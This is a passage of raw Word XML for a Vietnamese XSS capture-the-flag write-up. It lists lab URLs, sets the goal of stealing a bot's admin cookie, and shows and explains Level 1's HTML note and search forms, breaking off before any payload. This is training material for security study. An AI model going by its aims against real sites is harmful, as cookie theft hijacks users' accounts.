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FE8B" w14:textId="4B6BA2DA" w:rsidR="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00376AFA">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chuỗi thử thách về lỗi bảo mật </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CB5D63" w14:textId="623BC10D" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Ôi, con mòe của CBJS hôm nay lên cơn cắn bậy, cắn cả link XSS. Nhưng nó đã nắm giữ quá nhiều bí mật, hãy gửi payload để đọc note của con mòe nhà CBJS bạn nhé:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCA6852" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Con mòe nè: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://victim.cyberjutsu-lab.tech/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3F10E4F6" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Note cấp độ 1: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://note1.cyberjutsu-lab.tech/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="062C7CAD" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Note cấp độ 2: </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://note2.cyberjutsu-lab.tech/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="73B79B03" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Note cấp độ 3: </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://note3.cyberjutsu-lab.tech/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="65C2BBB2" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Note cấp độ 4: </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://note4.cyberjutsu-lab.tech/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AA7945F" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Note cấp độ 5: </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://note5.cyberjutsu-lab.tech/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="09F3F242" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Còn con mòe cuối thì cướp luôn cookie admin từ trong tay con mòe nhé:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA17742" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Note  Con mòe cấp độ cuối: </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://note6.cyberjutsu-lab.tech/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="43692267" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Chú ý: Con mòe cắn tất cả link của tất cả cấp độ, nên hãy dùng các link note để chuẩn bị payload cho đúng level trước rồi gửi cho con mòe nhé!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335993F9" w14:textId="77777777" w:rsidR="00C42DF5" w:rsidRPr="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00C42DF5">
        <w:t>Sau khi hoàn thành nhiệm vụ, bạn vui lòng nộp lại Flag tại link: </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00C42DF5">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://wpt.cyberjutsu.io/challenges</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B73C05C" w14:textId="5427E0BC" w:rsidR="00C42DF5" w:rsidRDefault="00C42DF5" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="443F0FA6" w14:textId="77777777" w:rsidR="00AC1705" w:rsidRPr="00FF23DE" w:rsidRDefault="00AC1705" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Level</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF23DE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42481E62" w14:textId="30987AEE" w:rsidR="00AC1705" w:rsidRPr="00FF23DE" w:rsidRDefault="00AC1705" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thông</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tin source code xử lý chính được cung cấp:</w:t>
      </w:r>
      <w:r w:rsidR="00F14D43">
        <w:t xml:space="preserve">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3364F4" w:rsidRPr="003364F4" w14:paraId="332D447F" w14:textId="77777777" w:rsidTr="003364F4">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="75B3A147" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="073F154F" w14:textId="31ECD3E6" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A213C90" w14:textId="6589E523" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="081D1105" w14:textId="76284D99" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>4</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E22A2D7" w14:textId="0335D747" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71CDEA85" w14:textId="43907976" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>6</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03AAD70C" w14:textId="18908654" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>7</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C089C09" w14:textId="7B7E028E" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0156D359" w14:textId="2C34EAB6" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>9</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AF6BB25" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>10</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66767506" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>11</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="697452D9" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E9B4FB6" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>13</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="174DBCC8" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>14</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C4FF8F5" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>15</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="430EA09A" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>16</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2334065E" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8707" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D4D4D4"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DE5167F" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>&lt;body&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="789CD183" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;h1&gt;Quick Note 1&lt;/h1&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="331E8474" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34CC2557" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;form action="/note" method="post"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16C15439" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">    &lt;label&gt;Note here:&lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11C8CB7A" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">    &lt;input type="text" name="note"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F32C6B5" w14:textId="2D1BEFE5" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">    &lt;input type="submit" value="</w:t>
            </w:r>
            <w:r w:rsidR="003D4932">
              <w:t>...</w:t>
            </w:r>
            <w:r w:rsidRPr="003364F4">
              <w:t>"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39FE0138" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="608197A9" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="66A411D3" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;form action="/search" method="get"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F4CA6EA" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">    &lt;label&gt;Search:&lt;/label&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AAC41FC" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">    &lt;input type="text" name="q"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D6C5EBA" w14:textId="30574FFE" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">    &lt;input type="submit" value="</w:t>
            </w:r>
            <w:r w:rsidR="003D4932">
              <w:t>...</w:t>
            </w:r>
            <w:r w:rsidRPr="003364F4">
              <w:t>"&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="017ADAEB" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;/form&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="612D1893" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;br&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A14A9E1" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t xml:space="preserve">  &lt;a href="/note"&gt;List note&lt;/a&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25C5DFF3" w14:textId="77777777" w:rsidR="003364F4" w:rsidRPr="003364F4" w:rsidRDefault="003364F4" w:rsidP="003D4932">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r w:rsidRPr="003364F4">
              <w:t>&lt;/body&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18E57CD8" w14:textId="1875376A" w:rsidR="0002152D" w:rsidRDefault="00DF056C" w:rsidP="003364F4">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00DF056C">
        <w:t xml:space="preserve">Đoạn HTML hiển thị giao diện đơn giản gồm tiêu đề, hai form và một liên </w:t>
      </w:r>
      <w:r>
        <w:t>kết:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BC2AA9" w14:textId="25A93CFB" w:rsidR="00DF056C" w:rsidRPr="00873FD8" w:rsidRDefault="00DF056C" w:rsidP="00D23CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873FD8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Form thêm ghi chú gửi trường note bằng phương thức POST tới endpoint /note. Dữ liệu này có thể được lưu vào session hoặc cơ sở dữ liệu tùy server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A475A5A" w14:textId="5D34C1A1" w:rsidR="00DF056C" w:rsidRPr="00873FD8" w:rsidRDefault="00DF056C" w:rsidP="00D23CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873FD8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Form tìm kiếm gửi trường q bằng phương thức GET tới /search, thường được dùng để phản hồi ngay với kết quả tìm kiếm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541DB0B" w14:textId="00C99A83" w:rsidR="00DF056C" w:rsidRDefault="00DF056C" w:rsidP="00D23CDA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00873FD8">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Liên kết List note dẫn tới trang liệt kê ghi chú, nơi dữ liệu người dùng có thể được render lại.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72411299" w14:textId="26C7BF9C" w:rsidR="00873FD8" w:rsidRPr="00873FD8" w:rsidRDefault="004D36ED" w:rsidP="00A82B37">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Với từng form sẽ có từng đoạn javascript </w:t>
      </w:r>
      <w:r w:rsidR="00A82B37" w:rsidRPr="00A82B37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">phía client để thực hiện thao tác tương ứng; ở đây </w:t>
      </w:r>
      <w:r w:rsidR="00A82B37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>mình sẽ</w:t>
      </w:r>
      <w:r w:rsidR="00A82B37" w:rsidRPr="00A82B37">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cstheme="minorHAnsi"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="vi-VN"/>
